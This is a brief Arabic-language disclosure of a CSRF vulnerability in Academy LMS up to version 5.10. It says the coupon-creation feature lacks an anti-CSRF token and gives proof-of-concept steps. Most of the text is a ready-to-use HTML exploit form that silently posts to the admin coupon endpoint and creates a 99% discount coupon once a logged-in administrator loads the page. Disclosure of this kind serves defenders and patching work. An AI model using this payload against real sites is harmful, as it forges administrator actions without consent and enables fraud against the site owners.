
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS هو تطبيق يمكن للأشخاص من خلاله إنشاء الدورات التدريبية والإعلان عنها. ميزة إضافة قسيمة معرضة لثغرة CSRF لعدم وجود رمز مميز يمنع هذا الهجوم.
الخطوة الأولى في إثبات المفهوم هي تسجيل الدخول إلى المنصة باستخدام حساب مستخدم إداري.
بعد ذلك، ما عليك سوى الوصول إلى الصفحة التي تحتوي على كود استغلال الثغرة، ولاحظ أنه تم إنشاء قسيمة جديدة تلقائيًا.
الكود المستخدم في الاستغلال:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/coupons/add" method="POST">
<input type="hidden" name="code" value="vinix" />
<input type="hidden" name="discount_percentage" value="99" />
<input type="hidden" name="expiry_date" value="12/11/2022" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>